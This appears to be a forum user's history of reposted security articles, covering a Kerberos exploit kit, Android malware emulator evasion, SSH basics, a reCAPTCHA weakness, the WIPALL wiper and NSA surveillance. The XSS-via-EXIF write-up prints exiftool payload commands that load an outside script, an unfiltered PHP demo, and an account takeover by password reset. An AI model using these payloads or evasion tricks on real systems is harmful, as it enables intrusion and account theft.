Everything posted by Nytro
-
Python Kerberos Exploitation Kit

PyKEK (Python Kerberos Exploitation Kit) is a Python library for manipulating KRB5-related data. (Still in development.) For now, only a few features have been implemented (in a rather quick'n'dirty way) to exploit MS14-068 (CVE-2014-6324). More is coming...

Author: Sylvain Monné
Contact: sylvain dot monne at solucom dot fr
http://twitter.com/bidord
Special thanks to: Benjamin DELPY (gentilkiwi)

Library content:
- kek.krb5: Kerberos V5 (RFC 4120) ASN.1 structures and basic protocol functions
- kek.ccache: Credential Cache binary format (ccache)
- kek.pac: Microsoft Privilege Attribute Certificate data structure (MS-PAC)
- kek.crypto: Kerberos- and MS-specific cryptographic functions

Exploits:
ms14-068.py exploits the MS14-068 vulnerability on an unpatched domain controller of an Active Directory domain to obtain a Kerberos ticket for an existing domain user account with the privileges of the following domain groups:
- Domain Users (513)
- Domain Admins (512)
- Schema Admins (518)
- Enterprise Admins (519)
- Group Policy Creator Owners (520)

Source: https://github.com/bidord/pykek
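Under the hood, the forged MS14-068 PAC claims membership in the groups listed above by appending each well-known RID to the domain SID. A minimal sketch of that SID construction (illustrative only, not PyKEK's actual API):

```python
# Sketch (not PyKEK's actual API): the well-known RIDs a forged
# MS14-068 PAC claims, appended to the domain SID to form full group SIDs.
FORGED_GROUP_RIDS = {
    512: "Domain Admins",
    513: "Domain Users",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}

def forged_group_sids(domain_sid: str) -> list:
    """Append each well-known RID to the domain SID (S-1-5-21-...)."""
    return [f"{domain_sid}-{rid}" for rid in sorted(FORGED_GROUP_RIDS)]

print(forged_group_sids("S-1-5-21-1004336348-1177238915-682003330"))
```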
-
Android Malware Evasion Techniques - Emulator Detection

Most modern malware tries to avoid being analysed, and one of the first things it does is check whether it is running in a controlled environment. In the world of Android malware, the controlled environment means an emulator: if the malware runs on an emulator, it is most probably being investigated by a researcher. Malware writers use various methods to detect an emulated environment.

1.) Check the product name: In the Android emulator, the product name of the device (android.os.Build.PRODUCT) contains the string "sdk", so it is a useful clue for detecting whether the app is running on an emulator.

2.) Check the model name: The default model name of the Android emulator (android.os.Build.MODEL) also contains the string "sdk", so it is worth checking the model name to detect emulator use.

3.) Check the SIM operator name: In Android emulators, the SIM operator name defaults to the string "Android". This is not what you see on regular physical devices, even when no SIM card is installed.

4.) Check the network operator name: Similar to the SIM operator name, the network operator name also defaults to "Android", so it is a good idea to check it when deciding whether the app is running on an emulator.

By combining the four techniques above, you can write a basic Android app that displays these values. To verify that they really work, install the app on both an emulator and a real device. The picture on the left-hand side is a screenshot taken from a Samsung Galaxy S4 phone, and the one on the right is a screenshot of an emulator; you can see the difference clearly.

5.) Check the ro.kernel.qemu and ro.secure properties: You can also inspect Android system properties to detect an emulated environment. There are several property files in the Android filesystem:

/default.prop
/system/build.prop
/data/local.prop

Properties are stored in these files as key-value pairs, and you can read a value with the adb shell getprop <key> command. Two properties in particular indicate an emulator environment:

ro.secure
ro.kernel.qemu

If the value of ro.secure is "0", or the value of ro.kernel.qemu is "1", the ADB shell runs as root, which means the environment the app is running in is an emulator; on a physical device the ADB shell runs with regular user rights, not root.

I uploaded sample detection code combining all the methods above to my GitHub page: https://github.com/oguzhantopgul/Android-Emulator-Detection

In this blog post I have covered my favourite Android emulator detection methods. If you know better techniques, please leave me a comment.

Edit: I've just noticed Tim Strazzere's (@timstrazz) Android project on emulator detection. You can find it in his GitHub repo: https://github.com/strazzere/anti-emulator

Published yesterday by Oguzhan Topgul

Source: {ouz}: Android Malware Evasion Techniques - Emulator Detection
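The combined decision logic of the five checks can be sketched as follows. This is a rough host-side illustration in Python rather than on-device Java: ro.product.name, ro.product.model, ro.kernel.qemu and ro.secure mirror real getprop keys, while sim.operator.name and net.operator.name are placeholder names for the values an app would read via TelephonyManager.

```python
# Sketch: decide whether a set of device properties looks like the Android
# emulator, combining the article's five heuristics. The sim.operator.name
# and net.operator.name keys are placeholders (assumptions), standing in for
# TelephonyManager.getSimOperatorName()/getNetworkOperatorName().
def looks_like_emulator(props: dict) -> bool:
    checks = [
        "sdk" in props.get("ro.product.name", "").lower(),   # 1) product name
        "sdk" in props.get("ro.product.model", "").lower(),  # 2) model name
        props.get("sim.operator.name") == "Android",         # 3) SIM operator
        props.get("net.operator.name") == "Android",         # 4) network operator
        props.get("ro.kernel.qemu") == "1",                  # 5) QEMU property
        props.get("ro.secure") == "0",                       # 5) adb runs as root
    ]
    return any(checks)

emulator = {"ro.product.name": "sdk", "ro.kernel.qemu": "1", "ro.secure": "0"}
phone = {"ro.product.name": "jfltexx", "ro.product.model": "GT-I9505",
         "ro.kernel.qemu": "0", "ro.secure": "1"}
print(looks_like_emulator(emulator), looks_like_emulator(phone))  # True False
```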
-
Getting started with SSH security and configuration

Are you a new UNIX administrator who needs to run communication over a network in the most secure fashion possible? Brush up on the basics, learn the intricate details of SSH, and delve into its advanced capabilities to securely automate your daily system maintenance and remote system management, and to use it in advanced scripts that manage multiple hosts.

PDF (391 KB) | Roger Hill (unixman@charter.net), independent author

What is SSH? A basic description

Secure Shell (SSH) was designed to afford the greatest protection when remotely accessing another host over the network. It encrypts the network exchange, provides better authentication facilities, and offers features such as Secure Copy (SCP), Secure File Transfer Protocol (SFTP), X session forwarding, and port forwarding to increase the security of other, insecure protocols. Various key sizes are available, ranging from 512 bits up to 32768 bits, along with ciphers such as Blowfish, Triple DES, CAST-128, the Advanced Encryption Standard (AES), and ARCFOUR. Higher-bit encryption configurations come at the cost of greater network bandwidth use.

Figure 1 and Figure 2 show how easily a telnet session can be casually viewed by anyone on the network using a network-sniffing application such as Wireshark.

Figure 1. Telnet protocol sessions are unencrypted.

Frequently used acronyms:
API: Application programming interface
FTP: File Transfer Protocol
IETF: Internet Engineering Task Force
POSIX: Portable Operating System Interface for UNIX
RFC: Request for Comments
VPN: Virtual private network

When using an unsecured, "clear text" protocol such as telnet, anyone on the network can pilfer your passwords and other sensitive information. Figure 1 shows user fsmythe logging in to a remote host through a telnet connection. He enters his user name fsmythe and password r@m$20!0, both of which are then viewable by any other user on the same network as our hapless and unsuspecting telnet user.

Figure 2. SSH protocol sessions are encrypted.

Figure 2 provides an overview of a typical SSH session and shows how the encrypted protocol cannot be viewed by any other user on the same network segment. Every major Linux® and UNIX® distribution now comes with a version of the SSH packages installed by default (typically the open source OpenSSH packages), so there is little need to download and compile from source. If you're not on a Linux or UNIX platform, a plethora of open source and freeware SSH-based tools with large, supportive user communities are available, such as WinSCP, PuTTY, FileZilla, TTSSH, and Cygwin (POSIX software installed on top of the Windows® operating system). These tools offer a UNIX- or Linux-like shell interface on a Windows platform. Whatever your operating system, SSH offers many benefits for commonplace, everyday computing: it is dependable, secure, and flexible, yet simple to install, use, and configure, not to mention feature laden.

SSH architecture

IETF RFCs 4251 through 4256 define SSH as the "Secure Shell Protocol for remote login and other secure network services over an insecure network." The protocol consists of three main elements (see Figure 3):

Transport Layer Protocol: accommodates server authentication, privacy, and integrity with perfect forward secrecy. This layer can provide optional compression and typically runs over a TCP/IP connection, but it can also be used on top of any other dependable data stream.
User Authentication Protocol: authenticates the client to the server; runs over the transport layer.
Connection Protocol: multiplexes the encrypted tunnel into numerous logical channels; runs over the User Authentication Protocol.

Figure 3. SSH protocol logical layers

The transport layer is responsible for key exchange and server authentication. It sets up encryption, integrity verification, and (optionally) compression, and exposes to the upper layer an API for sending and receiving plaintext packets. The user authentication layer provides authentication for clients and supports several authentication methods; common methods include password, public key, keyboard-interactive, GSSAPI, SecurID, and PAM. The connection layer defines the channels, global requests, and channel requests through which SSH services are provided. A single SSH connection can host multiple channels concurrently, each transferring data in both directions. Channel requests relay information such as the exit code of a server-side process, and the SSH client initiates a request to forward a server-side port.

This open architecture provides extensive flexibility. The transport layer is comparable to Transport Layer Security (TLS), and you can employ custom authentication methods to extend the user authentication layer. Through the connection layer, you can multiplex secondary sessions into a single SSH connection (see Figure 4).

Full article: Getting started with SSH security and configuration
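Hardening guidance like the above can be turned into a quick automated check. Here is a minimal, hypothetical sketch that scans sshd_config-style text for a few commonly-hardened directives; the set of "risky" values is an illustrative assumption, not an authoritative audit checklist:

```python
# Sketch: flag a few commonly-hardened sshd_config directives.
# The RISKY table is an illustrative assumption, not an exhaustive audit.
RISKY = {
    "permitrootlogin": {"yes"},
    "passwordauthentication": {"yes"},
    "permitemptypasswords": {"yes"},
    "protocol": {"1", "1,2", "2,1"},  # SSH protocol 1 is long deprecated
}

def audit_sshd_config(text: str) -> list:
    """Return the directives whose values match the RISKY table."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        if value in RISKY.get(key, ()):
            findings.append(f"{parts[0]} {parts[1].strip()}")
    return findings

sample = "Port 22\nPermitRootLogin yes\nPasswordAuthentication no\n"
print(audit_sshd_config(sample))  # ['PermitRootLogin yes']
```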
-
Finding Zero-Day XSS Vulns via Doc Metadata

Posted by eskoudis. Filed under Methodology, web pen testing.

[Editor's Note: Chris Andre Dale has a nice article for us about cross-site scripting attacks, and he's found a ton of them in various high-profile platforms on the Internet, especially in sites that display or process images. He even found one in WordPress and responsibly disclosed it, resulting in a fix for the platform released just a few weeks ago. In this article, Chris shares his approach and discoveries, with useful lessons for all pen testers. Oh... and if you are going to test systems, make sure you have appropriate permission and don't do anything that could break a target system or harm its users. Thanks for the article, Chris! --Ed.]

By Chris Andre Dale

XSS Here, XSS There, XSS Everywhere!

Today cross-site scripting (XSS) is very widespread. While it is not a newly discovered attack vector, we still see it all the time in the wild. Do you remember, back in the day, clicking on a website's guestbook and suddenly getting tons of pop-ups or redirections? Yeah, that's often XSS for you. Today I see XSS vulnerabilities in almost all of the penetration testing engagements I conduct. Even to this very day, there is evidence of old XSS worms stuck on the web. Remember MySpace? Yeah, me neither. Do a Google search for "Samy is my hero site:myspace.com" and you will see thousands of ghostly remains of an XSS worm from 2006. The infamous Samy worm itself no longer lingers; what you are seeing are the remains of MySpace profiles that fell victim to it back in 2006.

XSS is usually ranked as only a medium impact when exploited; OWASP, for instance, rates the vulnerability as moderate impact. I disagree. In many cases XSS can be truly brutal, and potentially life threatening. What do I mean?
When XSS is bundled with other vulnerabilities, such as cross-site request forgery (CSRF), we can quickly imagine some very nasty scenarios. What if your XSS exploit hooks an IT operations administrator, and through the XSS you add your CSRF payloads to perform administrative functions against their HVAC solutions? Alternatively, consider the unfortunate event where an attacker has successfully compromised thousands of hosts, using them all to DDoS an unsuspecting victim.

New XSS attack vectors arise all the time, but we don't often see something truly new or untraditional. Wouldn't it be cool to see something other than just your ordinary filter bypass? In this article, I'll cover how I've successfully found 0-day exploits in WordPress, public sites, and plugins for popular CMS systems merely by using this technique.

Let's take a look at embedding XSS payloads into image metadata, more specifically the EXIF data in JPEG images. This can be accomplished in several ways. If you are old school (or perhaps just old), you can do it by modifying your camera settings: the camera used here is a Canon(1). Any self-respecting hacker, though, uses ExifTool(2) by Phil Harvey to accomplish the task. The following command adds/overwrites an EXIF tag, specifically the camera model that was allegedly used to take the photograph:

exiftool.exe -"Camera Model Name"="// " "C:\research.jpg"

Let's not stop at the model name; let's extend it to other values as well. As you can see, we've added the standard JavaScript alert code to a whole set of different EXIF data fields. Now we'll create a simple PHP script that mimics a real-world example of a system that uses EXIF data:

```php
<?php
// Deliberately unfiltered demo: dump every EXIF key/value found in the image.
$filename = $_GET['filename'];
echo $filename . " \n";

$exif = exif_read_data('tests/' . $filename, 'IFD0');
echo $exif === false ? "No header data found. \n" : "Image contains headers \n";

$exif = exif_read_data('tests/' . $filename, 0, true);
foreach ($exif as $key => $section) {
    foreach ($section as $name => $val) {
        echo "$key.$name: $val \n";
    }
}
?>
```

The above script simply iterates through all the EXIF data keys it finds and outputs the respective values. For testing purposes, this is exactly what we want. PHP's EXIF parser does no filtering by default, which makes this attack vector very interesting to test: in cases where a developer has forgotten to sanitize these fields, we may have a successful attack. Developers often think some of their data is read-only, so why would they EVER need to sanitize it?! A common mistake...

Using the script above, armed with our metadata-bombed picture, we can try to attack ourselves through the demo script. In the following picture, we have told the script to fetch our metadata-bombed picture, illustrating the attack with a simple JavaScript pop-up.

So what? We've successfully attacked ourselves with a pop-up message? Well, there is much more to this than just attacking ourselves. First, we've verified that there is no built-in filtering in the PHP exif_read_data function. That means developers need to remember to apply filtering manually, and as we covered before, we all know that developers always remember this... Second, we've verified that we can get executable JavaScript into someone's browser. From here, we can rewrite our pop-up payload into something much more subtle and evil, such as a BeEF hook. More on this later.

Scouring for 0-Days

Armed with a fully metadata-bombed picture, I set sail into the Wild Wild Web. I had to check whether my assumption that developers fail to sanitize EXIF data was true. From there, I roamed into the depths of picture upload sites... I started googling "upload picture", "picture sharing", "photograph sharing", and much more.
On the sites I found interesting, I registered an account and started uploading my pictures. On a side note, Mailinator(3) comes in handy for this kind of research. In fact, I registered with the account no-reply@mailinator.com on most of the sites; to my great surprise, one of the sites already had an account with this username! What?! Someone had actually registered this account before? Then undoubtedly I could do a password reset, and sure enough, by doing so I gained access to someone else's account. Whew... Now, who would EVER register an account for their private pictures with a Mailinator address? Another security researcher? Criminals? Where do I go from here? Do I really want to venture into someone else's account? If so, what will I find? Regardless of my questions and doubt, I decided to continue, knowing surely that there was no turning back from what I might be about to see. To my surprise, and more importantly to my relief, the site contained a bunch of family vacation pictures from a trip to Indonesia.

Many of the sites required registration, and many did not show any metadata at all. Out of 21 sites tested, 11 did not have a feature to display EXIF data, 7 had at least rudimentary filtering, and 3 were found to be vulnerable. Not amazing numbers, but still fun to see it working in the wild, outside of my lab. What do I mean by rudimentary filtering? It just means I didn't try to bypass the filtering. Additionally, I tested the attack vector on 3 WordPress plugins: 2 were found vulnerable and one had the appropriate filtering in place. Responsible disclosure to the sites and plugin authors has been conducted, and some of the examples in this article have been anonymized because, as of publication, they have still not patched the issue.

Keep in mind that many of the sites applying filtering could still be vulnerable: I did not attempt any filter bypass in my testing, and my gut feeling is that the filters were very rudimentary and could easily be bypassed.

First, here is an example from 500px.com, which was not found to be vulnerable. You can see the payload present in the title, and the camera field is automatically populated by the site. That means that instead of prompting me to set a title for my picture, the site used one of the EXIF data fields to pre-populate it for me. Interesting... this was a repeating characteristic I saw while testing. Flickr also did appropriate filtering (again, no filter bypass was tried).

One particular site did not like my testing at all; when I tried to upload my picture, it seemed to break something. Anyway, we're not here for the failures, are we? We're here for the success stories! Ahh, this is the wonderful world of hacking... gaining success through other people's failures... *evil grin*

Here is a site where we can see our attack manifest itself: just uploading the picture and then viewing it triggers the vulnerability. I also found the same vulnerability at other sites. We can see the image I've uploaded in the background -- a princess and a unicorn. Sadly, no farting rainbows...

Many of the big sites were also tested, such as Google Plus, DeviantArt, and Photobucket; these were all applying some filtering. A site that did not apply the necessary filtering, however, was WordPress. In the screenshot above I've successfully uploaded an image and triggered the payload by accessing it through its respective attachment page. Remember, I am using a harmless payload that just alerts a text message; this could be a completely stealthy attack payload if I wanted it to be. Let's dive further into the WordPress finding.

The WordPress Exploit

WordPress is the most popular blogging platform on the internet today, running more than 60 million websites in 2012(4).
Finding working exploits in such a platform can be very interesting to many actors, hence WordPress also runs a bug bounty program(5). The vulnerability I'm demonstrating in this paper was submitted to WordPress through responsible disclosure, and we held this article until they had properly patched the issue.

The WordPress vulnerability manifests when an administrator or editor uploads an image whose ImageDescription EXIF tag is set to a JavaScript payload. The exploit works only for these privileged accounts, as stricter filtering is applied to the other roles. This has sparked some controversy about the vulnerability; however, as I will show in this article, we can create an attack that is fully stealthy, taking place without the administrator knowing what is going on. Why the controversy? In WordPress, as in other CMS systems such as SharePoint, some roles are allowed to upload HTML elements: WordPress administrators and editors are allowed to post unfiltered HTML(6). The other side of the controversy is how stealthy the attack can be made: the administrator has very limited ways to realize he is doing something wrong and is actually uploading malware onto his own site. Now, that's cool! This is also why WordPress chose to patch the issue.

Embedding some JavaScript into the tag and then uploading the image will trigger the vulnerability once a user views the image's attachment page. Using ExifTool, you can accomplish this with the following command. Here I've changed my JavaScript payload to a reference to an external script instead of embedding the JavaScript itself in the image; this gives us increased flexibility when creating working payloads:

exiftool.exe -"ImageDescription"="<script src=\"http://pentesting.securesolutions.no/js.js\">" paramtest1.jpg

The following example is one of my first runs of the attack. It is not stealthy, as the administrator can easily notice that something is wrong simply by looking at the title element of the page: WordPress uses the ImageDescription element to populate the title element (and properly filters it before doing so). We'll soon see how to bypass this. The attack works when you navigate to the attachment page, but any WordPress editor with an IQ higher than their shoe size would most likely realize something is fishy and immediately delete the picture. If we stopped at this point, I don't think the issue would warrant a patch or much attention at all; the next steps, however, allow us to go into stealth mode.

If I could figure out a way for the payload to be embedded without the title element being overridden, the attack would become feasible. Luckily, I discovered a small artifact while testing. Trying different types of encoding and other obfuscation techniques produced some really long strings, and I noticed that when the string was long enough, WordPress suddenly defaulted to using the filename as the title element! Nice! The following ExifTool command makes WordPress ignore the ImageDescription, allowing a more stealthy attack:

exiftool.exe -"ImageDescription"="                              <script src=\"http://pentesting.securesolutions.no/js.js\"></script>" paramtest1.jpg

Notice all the extra spaces: this padding makes WordPress decide the value is too long for the title field, so it defaults to simply using the filename. The attack now manifests more beautifully when we upload the picture: the picture loads normally, and our XSS vector is invisible. Here is what happens when someone, e.g. the administrator, visits the picture: the screenshot shows how I've successfully included my malicious JavaScript. This could be a simple BeEF(7) hook, allowing us a very high level of control over the victims. From here, it's game over. Best regards, Cross-Site Scripting.

Why stop at EXIF data?
What about other types of data? Perhaps not in the same magnitude as online EXIF parsers, but let's look at embedding XSS into other data as well. What if a webpage allowed you to upload a Word document, then automatically extracted the Author field of the document and embedded it on the site? That could definitely lead to a vulnerability. It sounds like a good vector for XSS attacks, or even other types of attacks such as SQL injection if the information is stored in a database. When I look at the document I'm writing right now, I can see a good deal of metadata. Without a doubt, many of these parameters can easily be changed by the user, either through ExifTool or using the word processor itself. The following example shows editing the username into an XSS payload. I do apologize for the Norwegian text; I've been cursed with a Norwegian installation of Windows and Office by my IT department.

Pictures and documents. What about audio? Here is an example of adding XSS to an MP3 file through the awesome free and open source tool Audacity(8). There are probably tons of other situations where we can add these types of attacks. It's up to us to find them before the bad guys do.

Conclusion

Let's consider the future. The data we embed in metadata today might, sometime in the future, exploit services that have not yet been developed. Perhaps we'll see XSS shooting out of projectors, chat services, glasses (e.g. Google Glass), or robots going crazy with alert(1)'s all over the place. Or perhaps, even cooler, your files embedded with XSS today might someday trigger a callback connection straight back to your BeEF hook...

The bottom line is that data coming from a third-party system, be it a user or another system, should be sanitized! You know that whole concept of garbage in, garbage out? Let's stop that. Additionally, it is important for pen testers to have this information in their arsenal when doing their testing. Testers need to think outside the box and cover as much testing surface as possible. Also, Ed Skoudis had a student who mentioned some great research that has been done on sites processing metadata; I recommend checking out the work at embeddedmetadata.org(9). It might spark some further testing and research for some of our readers. Now, go onward my friends and...

References:
(1) http://www.amazon.com/Canon-CMOS-Digital-Camera-3-0-Inch/dp/B0040JHVCC
(2) http://www.sno.phy.queensu.ca/~phil/exiftool/
(3) http://mailinator.com/
(4) With 60 Million Websites, WordPress Rules The Web. So Where's The Money? - Forbes
(5) Security — Automattic
(6) WordPress Security Bug Bounty Program - White Fir Design
(7) BeEF - The Browser Exploitation Framework Project
(8) Audacity: Free Audio Editor and Recorder
(9) Embedded Metadata Initiative

-Chris Andre Dale

Source: SANS Penetration Testing | Finding Zero-Day XSS Vulns via Doc Metadata | SANS Institute
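On the consuming side, the fix for the whole class of bugs above is the classic one: treat metadata as untrusted input and encode it for the output context. A minimal sketch of that sanitization (in Python rather than the PHP shown earlier; the dict stands in for whatever an EXIF parser returns):

```python
import html

# Sketch: HTML-escape untrusted EXIF values before echoing them into a page.
# The input dict stands in for whatever an exif_read_data-style parser returns.
def render_exif(exif: dict) -> str:
    lines = []
    for key, val in exif.items():
        # Escape both key and value; metadata keys can be attacker-influenced too.
        lines.append(f"{html.escape(str(key))}: {html.escape(str(val))}")
    return "\n".join(lines)

tainted = {"Model": "<script>alert(1)</script>"}
print(render_exif(tainted))  # Model: &lt;script&gt;alert(1)&lt;/script&gt;
```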
-
The No CAPTCHA problem

When I read about No CAPTCHA for the first time, I was really excited. Did we finally find a better solution? Hashcash? Or what? Now that it's finally available, the blog post disappointed me a bit.

Here's the WordPress registration page successfully using No CAPTCHA. Now let's open it in an incognito tab... Wait, the annoying CAPTCHA again? But I'm a human!

So what Google is trying to sell us as a comprehensive bot-detecting algorithm is simply a whitelist based on your previous online behavior and the CAPTCHAs you solved. Essentially: your cookies. Under the hood they replaced challenge/response pairs with a "g-recaptcha-response" token. Good guys get it "for free"; bad guys still have to solve a challenge.

Does it make a bot's job harder? Not at all. The legacy flow is still available, and old OCR bots can keep recognizing. But what about the new "find a similar image" challenges? Bots can't do that! As long as $1 per hour is acceptable to many people in the third world, bots won't need to solve the new challenges. No matter how complex they are, bots simply need to fetch the JS code of the challenge, show it to another human being (working for cheap, or just a visitor on a popular website), and use the answer that human provided.

The thing is, No CAPTCHA actually introduces a new weakness! By abusing clickjacking we can make the user (a good guy) generate a g-recaptcha-response for us with a single click (demo bot for WordPress). Then we can use that g-recaptcha-response to make a valid request to the victim site (from our server or from the user's browser). This is a fairly serious weakness of the new reCAPTCHA: instead of making everyone recognize those images, we can make a bunch of good, "trustworthy" users generate g-recaptcha-response tokens for us. The bot's job just got easier!

You're probably surprised: how can we use a third-party data-sitekey on our own website? Don't be; the referrer-based protection was pretty easy to bypass with <meta name="referrer" content="never">.

P.S. Many developers still think you need to wait a while to get a new challenge.

@homakov I've used them in the past, accuracy is about 80% and response time about 10 seconds per attempt. Still too slow for some attacks. — Stephen de Vries (@stephendv) December 4, 2014

In fact, you can prepare as many challenges as you want and then start spamming later. This is another reCAPTCHA weakness that will never be fixed.

Posted by Egor Homakov at 3:52 AM

Source: Egor Homakov: The No CAPTCHA problem
-
FFmpeg 2.5 Officially Released

By Silviu Stahie

The developers have added some new features.

FFmpeg is a complete solution to record, convert, and stream audio and video, and it has just been upgraded to a new major version, 2.5. It comes with a lot of new features, and it's pretty interesting. FFmpeg 2.5 has been dubbed "Bohr" and comes just 2.5 months after the previous release. There are not as many changes as you might think, but there are more than enough to keep users interested.

"2.5 was released on 2014-12-04. It is the latest stable FFmpeg release from the 2.5 release branch, which was cut from master on 2014-12-04. Amongst lots of other changes, it includes all changes from ffmpeg-mt, libav master of 2014-12-03, libav 11 as of 2014-12-03," reads the official announcement.

Some of the updated libraries in the latest FFmpeg framework include libavutil, libavcodec, libavformat, libavdevice, libavfilter, libavresample, libswscale, libswresample, and libpostproc. The devs have also said that an STL subtitle decoder is now supported, the XCB-based screen grabber is now working properly, a SUP/PGS subtitle demuxer is now available, and a number of fixes have been implemented as well.

FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter, and play pretty much any media that humans and machines have created. A complete list of updates, features, and other fixes can be found in the official announcement. You can download the FFmpeg 2.5 source package right now from Softpedia.

Source: FFmpeg 2.5 Officially Released - Softpedia
-
GCHQ boffins quantum-busted its OWN crypto primitive

'Soliloquy' only ever talked to itself

By Richard Chirgwin, 3 Dec 2014

While the application of quantum computers to cracking cryptography is still, for now, a futuristic scenario, crypto researchers are already taking that future seriously. It came as a surprise to Vulture South to find that in October of this year, researchers at GCHQ's information security arm, the CESG, abandoned work on a security primitive because they discovered a quantum attack against it. Presented to the ETSI here, with the full paper here, the documents outline the birth and death of a primitive the CESG called Soliloquy.

Primitives are building blocks in the dizzyingly complex business of assembling a cryptosystem: individual modules that are expected to be very well characterised before they're accepted into security standards (and, in the case of crypto like RC4, dropped when they're no longer safe). Given that improving computer power is one of the ways a primitive can be broken, there's a constant background research effort both into creating the primitives of the future and into testing them before they're adopted; that's where Soliloquy comes in.

As the CESG paper states, Soliloquy was first proposed in 2007 as a cyclic-lattice key-exchange primitive supporting public keys of between 3,000 and 10,000 bits. Between 2010 and 2013, presumably as part of their effort to case-harden the primitive before releasing it into the wild, the boffins (Peter Campbell, Michael Groves and Dan Shepherd) developed what they call "a reasonably efficient quantum attack on the primitive", and as a result they cancelled the project.

The quantum algorithm they describe would work by creating a quantum fingerprint of the lattice Soliloquy creates; "discretise and bound" the control space needed; and run a quantum Fourier transform over that control space, iteratively, to collect many samples approximating the lattice. That is where the quantum part of the attack ends: the samples are then fed into a classical lattice-based algorithm to recover the values you want, in other words the key. The main challenge, the authors write, is "to define a suitable quantum fingerprinter" that could handle the control space.

As the researchers drily note in their conclusion, "designing quantum-resistant cryptography is a difficult task", and while researchers are starting to create such algorithms for deployment, "we caution that much care and patience will be required" to provide a thorough security assessment of any such protocol. ®

Source: GCHQ boffins quantum-busted its OWN crypto primitive • The Register
-
An Analysis of the “Destructive” Malware Behind FBI Warnings 4:06 pm (UTC-7) | by Trend Micro TrendLabs engineers were recently able to obtain a malware sample of the “destructive malware” described in reports about the Federal Bureau of Investigation (FBI) warning to U.S. businesses last December 2. According to Reuters, the FBI issued a warning to businesses to remain vigilant against this new “destructive” malware in the wake of the recent Sony Pictures attack. As of this writing, the link between the Sony breach and the malware mentioned by the FBI has yet to be verified. The FBI flash memo titled “#A-000044-mw” describes an overview of the malware behavior, which reportedly has the capability to overwrite all data on the hard drives of computers, including the master boot record, which prevents them from booting up. Below is an analysis of our own findings: Analysis of the BKDR_WIPALL Malware Our detection for the malware detailed in the FBI report is BKDR_WIPALL. Below is a quick overview of the infection chain for this attack. The main installer here is diskpartmg16.exe (detected as BKDR_WIPALL.A). BKDR_WIPALL.A’s overlay is encrypted with a set of user names and passwords as seen in the screenshot below: Figure 1. BKDR_WIPALL.A’s overlay contains encrypted user names and passwords These user names and passwords are found to be encrypted by XOR 0x67 in the overlay of the malware sample and are then used to log into the shared network. Once logged in, the malware attempts to grant full access to everyone who accesses the system root. Figure 2. Code snippet of the malware logging into the network The dropped net_var.dat contains a list of targeted hostnames: Figure 3. Targeted host names The next related malware is igfxtrayex.exe (detected as BKDR_WIPALL.B), which is dropped by BKDR_WIPALL.A. It sleeps for 10 minutes (or 600,000 milliseconds as seen below) before it carries out its actual malware routines: Figure 4.
BKDR_WIPALL.B (igfxtrayex.exe) sleeps for 10 minutes Figure 5. Encrypted list of usernames and passwords also present in BKDR_WIPALL.B Figure 6. Code snippet of the main routine of igfxtrayex.exe (BKDR_WIPALL.B) This malware’s routines, aside from deleting users’ files, include stopping the Microsoft Exchange Information Store service. After it does this, the malware sleeps for another two hours. It then forces the system to reboot. Figure 7. Code snippet of the force reboot It also executes several copies of itself named taskhost{random 2 characters}.exe with the following parameters: taskhost{random 2 characters}.exe -w – to drop and execute the component Windows\iissvr.exe taskhost{random 2 characters}.exe -m – to drop and execute Windows\Temp\usbdrv32.sys taskhost{random 2 characters}.exe -d – to delete files in all fixed or remote (network) drives Figure 8. The malware deletes all the files (format *.*) in fixed and network drives The malware components are encrypted and stored in the resource below: Figure 9. BKDR_WIPALL.B malware components Additionally, BKDR_WIPALL.B accesses the physical drive that it attempts to overwrite: Figure 10. BKDR_WIPALL.B overwrites physical drives We will be updating this post with our additional analysis of the WIPALL malware. Analysis by Rhena Inocencio and Alvin Bacani Update as of December 3, 2014, 5:30 PM PST Upon analysis of the same WIPALL malware family, its variant BKDR_WIPALL.D drops BKDR_WIPALL.C, which, in turn, drops the file walls.bmp in the Windows directory. The .BMP file is as pictured below: Figure 11. Dropped wallpaper This appears to be the same wallpaper described in reports about the recent Sony hack last November 24 bearing the phrase “hacked by #GOP.” Therefore we have reason to believe that this is the same malware used in the recent attack on Sony Pictures. Note that BKDR_WIPALL.C is also dropped, named igfxtrayex.exe, in the same directory as BKDR_WIPALL.D.
We will update this blog entry with further developments. Additional analysis by Joie Salvio Sursa: An Analysis of the "Destructive" Malware Behind FBI Warnings
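The single-byte XOR obfuscation described above (XOR with key 0x67) is trivial to reproduce. Here is a minimal sketch; the credential string below is hypothetical sample data for illustration, not taken from the actual malware:

```python
def xor_0x67(data: bytes) -> bytes:
    """Encode/decode a buffer with the single-byte XOR key 0x67.

    XOR with a fixed key is symmetric: applying the same routine
    twice returns the original bytes, so one function both hides
    and recovers the embedded credentials.
    """
    return bytes(b ^ 0x67 for b in data)

# Hypothetical plaintext credential pair (illustration only)
plain = b"admin:Passw0rd!"
obfuscated = xor_0x67(plain)

assert obfuscated != plain            # bytes no longer readable as-is
assert xor_0x67(obfuscated) == plain  # XOR is its own inverse
```

This symmetry is why an analyst who spots the 0x67 constant in the binary can immediately dump the plaintext user names and passwords from the overlay.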
-
How the NSA Hacks Cellphone Networks Worldwide By Ryan Gallagher @rj_gallagher In March 2011, two weeks before the Western intervention in Libya, a secret message was delivered to the National Security Agency. An intelligence unit within the U.S. military’s Africa Command needed help to hack into Libya’s cellphone networks and monitor text messages. For the NSA, the task was easy. The agency had already obtained technical information about the cellphone carriers’ internal systems by spying on documents sent among company employees, and these details would provide the perfect blueprint to help the military break into the networks. The NSA’s assistance in the Libya operation, however, was not an isolated case. It was part of a much larger surveillance program—global in its scope and ramifications—targeted not just at hostile countries. According to documents contained in the archive of material provided to The Intercept by whistleblower Edward Snowden, the NSA has spied on hundreds of companies and organizations internationally, including in countries closely allied to the United States, in an effort to find security weaknesses in cellphone technology that it can exploit for surveillance. The documents also reveal how the NSA plans to secretly introduce new flaws into communication systems so that they can be tapped into—a controversial tactic that security experts say could be exposing the general population to criminal hackers. Codenamed AURORAGOLD, the covert operation has monitored the content of messages sent and received by more than 1,200 email accounts associated with major cellphone network operators, intercepting confidential company planning papers that help the NSA hack into phone networks. One high-profile surveillance target is the GSM Association, an influential U.K.-headquartered trade group that works closely with large U.S.-based firms including Microsoft, Facebook, AT&T, and Cisco, and is currently being funded by the U.S. 
